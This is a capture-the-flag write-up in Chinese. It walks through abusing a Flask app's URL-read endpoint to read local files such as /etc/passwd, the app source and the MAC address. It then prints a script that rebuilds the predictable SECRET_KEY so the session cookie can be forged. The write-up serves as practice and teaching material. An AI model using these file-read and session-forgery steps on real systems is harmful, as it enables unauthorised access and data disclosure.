首先打开题目环境
有一个链接可以打开
这就直接跳转到了百度,在url栏里面有参数,就像直接试试读取文件
尝试读取/etc/passwd
成功读取,那就试试看能不能直接读取flag
果然不行,然后看了眼cookie,里面有session,那会不会是flask伪造???
那里面的session拿到JWT上解
解出这个,后面是base64加密的,解密后为www-data
如果是flask伪造的话我们就要找SECRET_KEY
读取/proc/self/environ
读取/app/app.py
# encoding:utf-8
import re, random, uuid, urllib
from flask import Flask, session, request
app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True
@app.route('/')
def index():
session['username'] = 'www-data'
return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'
@app.route('/read')
def read():
try:
url = request.args.get('url')
m = re.findall('^file.*', url, re.IGNORECASE)
n = re.findall('flag', url, re.IGNORECASE)
if m or n:
return 'No Hack'
res = urllib.urlopen(url)
return res.read()
except Exception as ex:
print str(ex)
return 'no response'
@app.route('/flag')
def flag():
if session and session['username'] == 'fuck':
return open('/flag.txt').read()
else:
return 'Access denied'
if __name__=='__main__':
app.run(
debug=True,
host="0.0.0.0"
)
根据这段代码,我们知道当username为fuck的时候可以获取flag
并且也知道了SECRET_KEY的获取方式app.config['SECRET_KEY'] = str(random.random()*233)
random.seed(uuid.getnode())
设置随机数种子,而python random生成的数是伪随机数,利用伪随机数的特性,只要种子是一样的,后面产生的随机数值也是一样的
uuid.getnode(),是网卡mac地址的十进制数,那我们就要知道网卡的mac地址,读取/sys/class/net/eth0/address
获得了mac地址,然后脚本把它转换为10进制数,然后转换成SECRET_KEY
import uuid
import random
mac = "02:42:ac:10:9c:3a"
temp = mac.split(':')
temp = [int(i,16) for i in temp]
temp = [bin(i).replace('0b','').zfill(8) for i in temp]
temp = ''.join(temp)
mac = int(temp,2)
random.seed(mac)
randStr = str(random.random()*233)
获得SECRET_KEY,伪造session
修改session
获得flag
flag{0221f202-cd99-4a50-84f2-e5deab965442}